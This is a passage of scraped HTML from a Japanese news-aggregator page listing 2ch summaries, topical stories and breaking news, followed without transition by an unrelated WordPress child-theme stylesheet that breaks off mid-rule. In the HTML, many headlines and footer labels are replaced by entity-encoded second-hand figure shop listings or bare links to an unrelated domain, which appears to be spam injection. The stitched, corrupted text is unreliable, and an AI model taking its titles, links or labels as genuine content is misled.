blog.livedoor.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/logs/bloglease/02031035385.html">http://factory.aedew.com/logs/bloglease/02031035385.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 4.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">14<span>コメント</span></span> <span class="date date_new">2 時間前  </span> <a href="http://alfalfalfa.com/articles/140453.html" target="_blank" class="item_direct"> - alfalfalfa.com</a></div> <div class="item_title"><a href="">SEALDs「電車で携帯のゲームやるのは知能が低い」 | 2ちゃんねるスレッドまとめブログ - アルファルファモザイク</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">16<span>コメント</span></span> <span class="date date_new">5 時間前  </span> <a href="http://blog.esuteru.com/archives/8449718.html" target="_blank" class="item_direct"> - blog.esuteru.com</a></div> <div class="item_title"><a href="">&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; ,&#12496;&#12540;&#12499;&#12540;&#12288;&#12456;&#12523;&#12505;?&#12524;&#12472;&#12455;&#12288;Herve Leger by Max Azria Barbie &#12510;&#12486;&#12523;</a></div> </div> <span class='debug' style='display:none;'><!--score: 2 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">14<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://blog.livedoor.jp/kinisoku/archives/4554064.html" target="_blank" class="item_direct"> - blog.livedoor.jp</a></div> <div class="item_title"><a href="">【画像】おい!クリスマスだしこの娘と野球拳しないかい:キニ速</a></div> </div> <span class='debug' style='display:none;'><!--score: 2 --></span> <div class="more"><a href="">2chまとめ をもっと見る</a></div> </div> <a name="area_10"></a> <div class="item_list_box " id="area_10"> <div class="list_title"> <div class="controler"></div> <h2><a href="">ネタ・話題・トピック</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over20">90<span>コメント</span></span> <span class="date date_new">15 時間前  </span> <a href="http://togetter.com/li/917078" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="">【速報】クリスマスに新たな山下達郎伝説が生まれた!? 「Gの音が出ない」と開始90分後にライブを中止 - Togetterまとめ</a></div> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/9ff1006fb7b6091ba48b957edf5a63cce85e1079.jpg" width="120" height="159" onerror="this.parentNode.style.display='none'" style="left:0px" /></a></div><p>山下達郎盛岡コンサート、90分やったところでまさかの中止。 本人が喉の調子に納得出来ないとのこと。 来年に無料で再演しにくるとの<span>ことで、伝説に立ち合えたのはラッキーだが、クリスマスイブ聞けなかった。</span>...ï¼»<a href="" target="_blank">続きを読む</a>ï¼½</p> </div> </div><span class='debug' style='display:none;'><!--score: 6.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">21<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://nlab.itmedia.co.jp/nl/articles/1512/26/news015.html" target="_blank" class="item_direct"> - nlab.itmedia.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/logs/bloglease/02030956219.html">http://factory.aedew.com/logs/bloglease/02030956219.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 4 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">15<span>コメント</span></span> <span class="date date_new">3 時間前  </span> <a href="http://togetter.com/li/917238" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="http://factory.aedew.com/logs/bloglease/02031010219.html">http://factory.aedew.com/logs/bloglease/02031010219.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">80<span>コメント</span></span> <span class="date">2015-12-25 12:31</span> <a href="http://togetter.com/li/916919" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="">Isul &#25126;&#22269;BASARA?&#27611;&#21033;&#20803;&#23601; (MOURI MOTONARI)&#12288;&#12464;&#12523;&#12540;&#12532;</a></div> </div> <span class='debug' style='display:none;'><!--score: 2.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">62<span>コメント</span></span> <span class="date">2015-12-25 08:36</span> <a href="http://d.hatena.ne.jp/ikkou2otosata0/touch/20151225/1450992232" target="_blank" class="item_direct"> - d.hatena.ne.jp</a></div> <div class="item_title"><a href="">オッケー、キリスト。ところで、あたしの誕生日の話も聞いとく? - 私の時代は終わった。</a></div> </div> <span class='debug' style='display:none;'><!--score: 2 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">17<span>コメント</span></span> <span class="date date_new">12 時間前  </span> <a href="http://togetter.com/li/917157" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="">&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; ,&#12304;&#12362;&#21462;&#12426;&#23492;&#12379;&#21830;&#21697;&#12305; &#12450;&#12540;&#12488;&#12514;&#12487;&#12523;&#12288;&#65323;1&#12288;1/70&#12288;&#27861;&#38534;&#23546;&#12288;&#20116;&#37325;&#22612; BIGMAN ( &#12499;&#12483;&#12464;&#12510;&#12531; )</a></div> </div> <span class='debug' style='display:none;'><!--score: 1.5 --></span> <div class="more"><a href="">ネタ・話題・トピック をもっと見る</a></div> </div> <script type="text/javascript"> //現在のセッティングを読み込み var setting = "ct:news:5;ct:society:5;ct:entertainment:5;ct:sports:5;ct:itnews:5;ct:international:3;ct:science:3;ct:odekake:3;ct:2ch:6;ct:neta:6;"; var setting_list = new Array(); setting_split = setting.split(";"); for (var i = 0; i < setting_split.length; i++) { if(!setting_split[i]){continue}; if(m = setting_split[i].match(/^([a-z]*):(.*):(d*)$/)){ setting_list[i+1] = new Array(m[1],m[2],m[3]); }else{ setting_list[i+1] = new Array(); } } controler_set(); </script> <!-- 以下カスタム用HTML --> <div id="edit_area_module" style="display:none;"> <div id="edit_area_AREAID" style="display:none;margin-bottom: 1em;"> <div class="list_title" style="text-align:right;font-size:85%;font-weight:100;"> <a href="javascript:void(0);" onclick="area_change_cancel(AREAID)">キャンセル</a> <div class="controler" style="display:none;"></div> </div> <div id="edit_area_inner_AREAID" style="border:8px solid #ccc;padding:3em 15%;font-size:90%;"> <h3>AREAID 番目のエリア</h3> <p>このエリアに表示するニュースを設定します。</p> <div id="edit_area_1_AREAID"> <select id="select_1_AREAID" onchange="edit_area_2(AREAID)" style="margin-top:1em;"> <option value="">▼表示内容を選んでください▼</option> <option value="ct">カテゴリから選ぶ</option> <option value="kw">任意のキーワードを指定する</option> </select> </div> <br /> <div id="edit_area_2ct_AREAID" style="display:none;"> <select id="select_2ct_AREAID"> <option value="">▼カテゴリを選んでください▼</option> <option value="all">すべての記事</option> <option value="news">ニュース総合</option> <option value="society">CD?DVD</option> <option value="international">海外ニュース</option> <option value="entertainment">エンタメ</option> <option value="sports">スポーツ</option> <option value="itnews">&#12507;&#12499;&#12540;</option> <option value="science">科学・学問</option> <option value="odekake">&#12396;&#12356;&#12368;&#12427;&#12415;</option> <option value="2ch">2chまとめ</option> <option value="neta">ネタ・話題・トピック</option> <option value="movie">動画</option> <option value="other">その他のニュース</option> </select> </div> <div id="edit_area_2kw_AREAID" style="display:none;"> キーワードを入力してください。<input id="select_2kw_AREAID" type="text" value="KEYWORD" size="32" /><br /> <div style="font-size:85%;color:#666;background:#eee;padding:0.5em;margin:0.5em 0;"> 入力したキーワードにヒットするニュースが配信されます。<br /> <b>複数指定</b>「AAA BBB」:スペースで区切るとAAAかつBBBにマッチする記事を配信します。<br /> <b>OR指定</b>「AAA OR BBB」:AAAまたはBBBにマッチする記事を配信します。ORはパイプ(|)も可。<br /> <b>特定のサイトを指定</b>「site:[URL]」:特定のURLにマッチする記事を配信します。<br /> <b>除外指定</b>「-XXX」:マイナスを付けると「XXX」にマッチする記事を除外します。 </div> </div> <div id="edit_area_3num_AREAID" style="display:none;"> 表示する数:<select id="select_3num_AREAID">NUMLIST</select> </div> <br /> <div style="line-height:2.5;"> <input type="button" value=" 決定 " onclick="area_change_save(AREAID)" style="font-size:150%;"/><br /> <input type="button" value="キャンセル" onclick="area_change_cancel(AREAID)" /> <input type="button" value="このエリアを削除" onclick="area_delete(AREAID)" /> <input type="button" value="この下にエリアを追加" onclick="area_add(AREAID)" /> <br /> <input type="button" value="1つ上へ移動" onclick="area_move(AREAID,-1)" /> <input type="button" value="1つ下へ移動" onclick="area_move(AREAID,1)" /> </div> </div> </div> </div> <!-- カスタム用HTMLここまで --> <div id="top_guidance"> </div><div class='pagenavi'><a href=''>全カテゴリ横断</a> <a href=''>昨日のランキング</a> </div><script type="text/javascript">footerbox_ad();</script></div> </div> <div id="side_column"> <div id="side_column_inner"> <div id="sidefollow"> <script type="text/javascript">sidebox_ad1()</script> <div id="side_flash" style="margin-bottom:4px;"> <div class="list_title"><h2><a href="">速報</a></h2></div> <div class="item_list_box"><div class="item"> <div class="item_status"> <span class="link_num over20">21<span>コメント</span></span> <span class="date date_new">42 分前   </span> <a href="http://news.line.me/list/886887b5/63a4858e236b" target="_blank" class="item_direct"> - news.line.me</a></div> <div class="item_title"><a href="">2016年新ヒーロー戦隊は「動物戦隊ジュウオウジャー」 - LINE NEWS</a></div> </div> <div class="item"> <div class="item_status"> <span class="link_num over3">11<span>コメント</span></span> <span class="date date_new">42 分前   </span> <a href="http://news.line.me/list/886887b5/eee8981f1889" target="_blank" class="item_direct"> - news.line.me</a></div> <div class="item_title"><a href="http://factory.aedew.com/logs/bloglease/02031037917.html">http://factory.aedew.com/logs/bloglease/02031037917.html</a></div> </div> <div id="side_imgs" style="margin-bottom:4px;"> <div class="list_title"><h2><a href="">画像で見る主要ニュース</a></h2></div> <div class="item_list_box"><div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/db592e52fb3695e73bb88902c6c90a5b239cd30b.jpg" width="120" height="120" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over500">506<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="">大安・仏滅…記載は不適切、県がカレンダー回収 (読売新聞) - Yahoo!ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 67 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/770aec9bed626d0714c63dd827bad4f4c20876b2.jpg" width="120" height="172" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over100">387<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00000062-san-sctch" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/logs/bloglease/02031014431.html">http://factory.aedew.com/logs/bloglease/02031014431.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 28 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/f2a5b22bc8e16c4289aaf7767c8ef71cce9c4104.jpg" width="120" height="129" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over100">134<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00000004-nksports-socc" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="">柿谷曜一朗C大阪復帰 違約金大幅減少で完全移籍へ (日刊スポーツ) - Yahoo!ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 26 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3d712f4a9f0d5a17af803c20b36a4d9d8bec0ea2.jpg" width="120" height="170" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over100">145<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://www.sankei.com/politics/news/151226/plt1512260001-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">&#12524;&#12468; &#12463;&#12522;&#12456;&#12452;&#12479;&#12540;?&#28783;&#21488;&#12398;&#23798; 5770,&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; </a></div> </div> <span class='debug' style='display:none;'><!--score: 26 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3df371797c2edb03a03491018247c6d1d6d51e42.jpg" width="160" height="120" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:-20px" /></a></div> <div class="item_status"> <span class="link_num over20">62<span>コメント</span></span> <span class="date date_new">2 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00010000-chibatopi-l12" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/logs/bloglease/02031052197.html">http://factory.aedew.com/logs/bloglease/02031052197.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 12 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/5f191d984c12ff6d166bf0cb65f99c56fedea305.jpg" width="180" height="120" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:-30px" /></a></div> <div class="item_status"> <span class="link_num over20">50<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://news.nicovideo.jp/watch/nw1961232" target="_blank" class="item_direct"> - news.nicovideo.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/logs/bloglease/02031017020.html">http://factory.aedew.com/logs/bloglease/02031017020.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 11 --></span> <div class="more"><a href="">もっと画像で見る</a></div></div> </div> </div> </div> </div> </div><!-- end field_inner --> </div><!-- end field--> <div id="footer_menu_bar" class="menu_bar"> <div id="footer_menu_bar_inner" class="menu_bar_inner"><ul><li><a href="/" class="selected">トップ</a></li><li><a href="./index.html">速報</a></li><li><a href="http://ceron.jp/news/">ニュース総合</a></li><li><a href="http://ceron.jp/society/">&#27169;&#22411;</a></li><li><a href="http://ceron.jp/entertainment/">エンタメ</a></li><li><a href="./index.html">スポーツ</a></li><li><a href="">IT</a></li><li><a href="http://ceron.jp/international/">海外</a></li><li><a href="http://ceron.jp/science/">科学</a></li><li><a href="./index.html">Pullip Rche (&#12523;&#12540;&#12471;&#12455;) P-081&#12288;&#12464;&#12523;&#12540;&#12532;</a></li><li><a href="http://ceron.jp/movie/">動画</a></li><li><a href="http://ceron.jp/2ch/">2ch</a></li><li><a href="http://ceron.jp/neta/">ネタ</a></li><li><a href="http://ceron.jp/all/">すべて</a></li></ul></div> </div><!-- /menu_bar --> <div id="footer"> <div id="footer_inner"> <a href="" title="&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; "><img src="/img/logo_s.png" width="64px" height="32px" /></a>  <span class="icon_set"> <a href="" title="RSS" class="icon icon_rss"></a> <a href="http://www.twitter.com/" target="_blank" title="twitter&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; " class="icon icon_twitter"></a> <a href="https://www.facebook.com/" target="_blank" title="facebook&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; " class="icon icon_facebook"></a> </span> <br /> <a href="">このサイトについて</a> - <a href="">ご意見・お問い合わせ</a> - <a href="">&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; </a> <br /><br /> <div class="footer_copyright"> <a href="">天気アプリ</a> | <a href="">&#12304;&#20013;&#21476;&#12305;&#12501;&#12451;&#12462;&#12517;&#12450; [&#12521;&#12531;&#12463;B] &#40165;&#12363;&#12372;&#12398;&#23569;&#22899; PVC&#22615;&#35013;&#28168;&#12415;&#23436;&#25104;&#21697;&#12304;&#12305;&#12304;&#30011;&#12305; </a> | <a href="">画像検索</a> | <a href="">Android音楽プレイヤー</a> | <a href="">メモ帳アプリ</a> </div> </div><!-- end footer_inner--> </div><!-- end footer--> </div><!-- end main--> </body> </html>
wp-content/themes/dante-child/style.css
roycocup/enclothed
/* LICENSE & DETAILS ================================================== Theme Name: Enclothed Description: Bespoke theme for Enclothed ltd Template: dante Version: 1.0 Author: Like Digital Media Author URI: www.likedigitalmedia.com ================================================== */ /* -------------------------------------------- DANTE CSS IMPORT -------------------------------------------- */ @import url("andy_style.css"); @import url("style-main.css"); @import url("datepicker.css"); @import url("sliders_options.css"); @font-face { font-family: 'proxbold'; src: url('fonts/proximanova-bold-webfont.eot'); src: url('fonts/proximanova-bold-webfont.eot?#iefix') format('embedded-opentype'), url('fonts/proximanova-bold-webfont.woff') format('woff'), url('fonts/proximanova-bold-webfont.ttf') format('truetype'), url('fonts/proximanova-bold-webfont.svg#proxima_nova_rgbold') format('svg'); font-weight: bold; font-style: normal; } @font-face { font-family: 'proxlight'; src: url('fonts/proximanova-light-webfont.eot'); src: url('fonts/proximanova-light-webfont.eot?#iefix') format('embedded-opentype'), url('fonts/proximanova-light-webfont.woff') format('woff'), url('fonts/proximanova-light-webfont.ttf') format('truetype'), url('fonts/proximanova-light-webfont.svg#proxima_novalight') format('svg'); font-weight: lighter; font-style: normal; } @font-face { font-family: 'proxregular'; src: url('fonts/proximanova-regular-webfont.eot'); src: url('fonts/proximanova-regular-webfont.eot?#iefix') format('embedded-opentype'), url('fonts/proximanova-regular-webfont.woff') format('woff'), url('fonts/proximanova-regular-webfont.ttf') format('truetype'), url('fonts/proximanova-regular-webfont.svg#proxima_nova_rgregular') format('svg'); font-weight: normal; font-style: normal; } /* -------------------------------------------- CHILD THEME CSS -------------------------------------------- */ html, body, p{ color: #000000; font-family: proxregular, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; } h1, h2, h3, h4, h5, h6 { color: #000000; font-family:proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; } h1{ text-align: center; font-family: proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; letter-spacing: 2px !important; font-size: 40px !important; line-height: 42px !important; text-transform: uppercase; } h2 { text-align: center; font-family: proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; line-height: 30px !important; text-transform: uppercase; letter-spacing: 2px !important; font-size: 28px !important; } h3 { text-align: center; font-family: proxregular, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; letter-spacing: 1px !important; font-size: 14px !important; line-height: 22px !important; text-transform: uppercase; } p{ font-size:16px; letter-spacing:1px; margin-bottom:16px; } strong{ font-family: proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif ; } .no-borders { border: none !important; } .no-padding { padding: 0 !important; } .no-margin { margin: 0 !important; } .no-margin-top { margin-top: 0 !important; } .no-margin-bottom { margin-bottom: 0 !important; } .no-border-top { border-top: none !important; } .no-border-bottom { border-bottom: none !important; } .no-padding-top{ padding-top:0 !important; } .no-padding-bottom{ padding-bottom:0 !important; } .center{ margin: auto !important; } .help-text .search-form{display: none;} .error404 .help-text a.sf-button{display: inherit; margin-top: 25px;} #top-header { border:none; } #top-header .th-right > nav .menu li { border: none; } .header-7 #top-header .th-right{ float:right; } .header-7 #top-header .th-left{ display:none; } #header .header-container { padding-top:0px; } #logo { background: transparent url('images/logo-black_x2.png') no-repeat; background-size: contain; max-height: 52px !important; } #logo h1 { visibility: hidden; } #logo a h1{ width: 232px !important; } #header-section#header { padding: 40px 0 30px 0; } #header-section { min-height: 132px !important; } #header { } .mobile-search-form{ display:none !important; } nav#main-navigation .menu > li > a{ color: #000000; text-decoration: none; font: 14px proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif; text-transform: uppercase; letter-spacing: 2px; } nav#main-navigation .menu > li > a span.nav-line { background-color: #b08536 !important; height: 3px !important; max-height: 3px !important; bottom: 3px !important; } #main-navigation{ margin-top:5px; } #mobile-menu ul li a, #mobile-menu ul li:hover a { text-decoration: none; font: 13px proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif; text-transform: uppercase; letter-spacing: 2px; } #mobile-menu ul{ margin:0; padding-left:0; } .spb_parallax_asset { -webkit-box-shadow: none !important; box-shadow: none !important; } @media only screen and (max-width: 767px){ .sticky-header{margin-top:40px; } .accordian-title { width: 90%; position: relative; display: block; font: 20px proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif; text-align: center; color: #000; left:auto; margin-bottom: 20px; text-transform: uppercase; margin: 0 auto; float: none; } .numbering2 { position: relative; margin: 0 auto; font: 80px proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif; text-align: center; color: #b08536; top: 10px; left:auto; opacity: 1; display: block; width: 30%; } .alt-bg { margin-left: -5px!important; margin-right: -5px!important; } } #logo a.mobile-menu-show { float: right; padding: 9px 4px 11px 10px; font-size: 22px; width: 42px; height: 35px; background:url(images/mobile_nav_icon.png) no-repeat -42px 0; content:""; transition:none !important; margin-top: 5px; } #logo a.mobile-menu-show:hover { background:url(images/mobile_nav_icon.png) no-repeat 0px 0; transition:none !important; } #logo a.mobile-menu-show:before { content:""; } .ss-rows,.ss-rows:before, .ss-rows.right:after{ content:""; } .mobile-menu-close { padding: 9px 13px 9px 13px; } .mobile-menu-close:hover { padding: 9px 13px 9px 13px; color: #b08536 !important; } .carousel-wrap > a:hover, #mobile-menu ul li:hover > a{ color: #b08536 !important; } #mobile-menu-wrap{ background-color:#0e2334 !important; } a.sf-button{ border-radius: 0 !important; padding:18px 40px 16px 40px; border:1px solid #fff !important; min-width:250px; margin-top:50px; } a.sf-button:hover{ background-color: #fff !important; } a.sf-button:hover span{ color: #b08536 !important; transition: all 0.2s ease-in-out; -moz-transition: all 0.2s ease-in-out; -webkit-transition: all 0.2s ease-in-out; -o-transition: all 0.2s ease-in-out; } a.sf-button span{ font-size:16pt !important; letter-spacing:3px; } a.sf-button.transparent{ border:1px solid #666 !important; } a.sf-button.transparent:hover{ background-color: transparent !important; } .fa-facebook.sf-icon.sf-icon-medium { font-size:34px !important; width: auto; height: auto; color:#0e2334; } .fa-rss.sf-icon.sf-icon-medium { font-size:34px !important; width: auto; height: auto; color:#0e2334; } .fa-twitter.sf-icon.sf-icon-medium { font-size:34px !important; width: auto; height: auto; color:#0e2334; } .fa-instagram.sf-icon.sf-icon-medium { font-size:34px !important; width: auto; height: auto; color:#0e2334; } .fa-tumblr.sf-icon.sf-icon-medium { font-size:34px !important; width: auto; height: auto; color:#0e2334; } .sf-icon-cont { border-color: #0e2334 !important; border-radius: 0 !important; padding: 5px !important; } .sf-icon-cont:hover, .sf-hover .sf-icon-cont, .sf-icon-box[class*="icon-box-boxed-"] .sf-icon-cont, .sf-hover .sf-icon-box-hr { background: none !important; background-color:#b08536 !important; } .social_buttons{ text-align:center; } .get_started_banner { border:none ; background-image: none !important; background-color: #f6f7f6 ; margin-top:-20px !important; margin-bottom: 20px !important;} .get_started_banner a.sf-button{ margin: 0 auto !important;} .spb_box_text.whitestroke .box-content-wrap { background-color: transparent !important; border-color: transparent !important; } .sf-icon-cont.cont-medium{ margin: 10px 16px 10px 16px !important; } #copyright nav .menu{ float:none; text-align:center; } #copyright nav .menu li{ float:none; border:none; } #footer{ display:none; } #copyright{ padding:50px 0 50px 0; border-top: 6px solid #b08536 !important; background: url(images/footer_pt.gif) #0e2334 repeat-x !important; } #copyright .container p{ width: 100%; text-align: center; padding-top: 20px; color:#b08536; } #copyright .container p a{ color:#b08536; } #copyright .container p a:hover{ text-decoration: underline; } nav.std-menu .menu li > a { font-weight:bold; margin:0 20px; } #back-to-top{ border-radius:0; } #main-container{ background: #fff; } .inner-page-wrap { margin-top: 30px; margin-bottom: 60px; min-height: 500px; } input,input[type="password"], textarea, select{ border:1px solid #cccdcc !important; background-color:#fff !important; color:#000 !important; } div#placeholder{ color:#000 !important; } .page_bottom_bg{position:absolute; bottom:0; background: url(images/page_bottom_bg_pattern.gif) repeat-x; background-position:bottom; height: 204px; width:100%; } .relative{ position:relative; } .fade-border-left{width:1px; position:absolute; left:-1px; background:url(images/border_gradient.gif) no-repeat; background-position:bottom; height:100%; } .fade-border-right{width:1px; position:absolute; right:-1px; background:url(images/border_gradient.gif) no-repeat; background-position:bottom; height:100%; } ::-webkit-input-placeholder { /* WebKit browsers */ color: #000; } :-moz-placeholder { /* Mozilla Firefox 4 to 18 */ color: #000; } ::-moz-placeholder { /* Mozilla Firefox 19+ */ color: #000; } :-ms-input-placeholder { /* Internet Explorer 10+ */ color: #000; } select::-ms-expand { display: none; } select { -webkit-appearance: none; -moz-appearance: none; text-indent: 1px; text-overflow: ''; } #login_box{ text-align:center; display:none; } #login_box a{ color:#b08536; text-transform:uppercase; font-size: 11px; letter-spacing: 1px; line-height: 40px; } #login_box a:hover{ color:#fff; text-decoration: none; } .login_button { width: 90%; max-width: 260px; height: 55px; position: relative; display: inline-block; border: 3px solid #000000; margin: 10px 0 10px 0; background-color: #000000; font: 18px proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif; color: #fff; text-transform: uppercase; letter-spacing: 3px; line-height: 50px; font-size: 18px; } label { -webkit-touch-callout: none; -webkit-user-select: none; -khtml-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } input[type=checkbox].css-checkbox { position: absolute; overflow: hidden; clip: rect(0 0 0 0); height:1px; width:1px; margin:-1px; padding:0; border:0; } label.css-label { height: auto; display:inline-block; line-height:15px; background-repeat:no-repeat; background-position: 0 0; font-size:15px; vertical-align:middle; cursor:pointer; font:14px proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif; color:#000; letter-spacing:1px; line-height:25px; float:left; margin:0 5% 5px 5%; width:90%; text-align: center; text-transform:uppercase; } input[type=checkbox].css-checkbox + label.css-label { padding-left:32px; height:25px; display:inline-block; line-height:15px; background-repeat:no-repeat; background-position: 0 0; font-size:15px; vertical-align:middle; cursor:pointer; font:14px proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif; color:#000; letter-spacing:1px; line-height:25px; float:left; text-align:left; margin:0; } input[type=checkbox].css-checkbox:checked + label.css-label { background-position: 0 -25px; } .tickbox{background-image:url(images/check.gif); } .wpcf7 textarea, .customer-info3 { width: 90%; max-width: 637px; height: 120px; border: 1px solid #cccdcc; font: 14px proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif; text-align: left; display: block; padding: 10px 10px 10px 20px; text-transform: uppercase; margin: 8px auto 50px auto; color: #525252; border-radius: 0px; -webkit-appearance: none; letter-spacing: 1px; } .wpcf7-form .wpcf7-form-control.wpcf7-submit.button4{ width: 90% !important; max-width: 290px !important; height: 55px !important; position: relative !important; display: inline-block !important; border: 3px solid #0e2334 !important; margin: 10px 0 10px 0 !important; background-color: #0e2334 !important; font: 18px proxbold, "Helvetica Neue", Arial, Helvetica, Geneva, sans-serif !important; color: #fff !important; text-transform: uppercase !important; letter-spacing: 2px !important; line-height: 00px !important; font-size:16px !important; border-radius: 0 !important; } .wpcf7-form .wpcf7-form-control.wpcf7-submit.button4:hover{ background-color: #0e2334 !important; color: #b08536 !important; } .line_separator { position: relative; width: 100%; height: 1px; background-color:#cccdcc; margin-bottom: 60px; } .line_separator_thick { position: absolute; height:8px; top:0; width:120px; left:50%; margin-left:-60px; } .line_separator_thick img{ float:left; } .georgia_text{ font-family:Georgia, 'Times New Roman', Times, serif !important; font-style:italic !important; text-transform: none !important; letter-spacing:0 !important; font-size:14px !important; margin-top:-30px !important; } .grey_bg{background-color: #f6f7f6; border-top: 1px solid #d1d1d1; border-bottom: 1px solid #d1d1d1; border:none; } .checkbox_wrap{width: 90%; max-width: 637px; height: 25px; margin:30px auto 50px auto; } .profile_page .inner-page-wrap{ margin-bottom:0; } .gold_bg{ 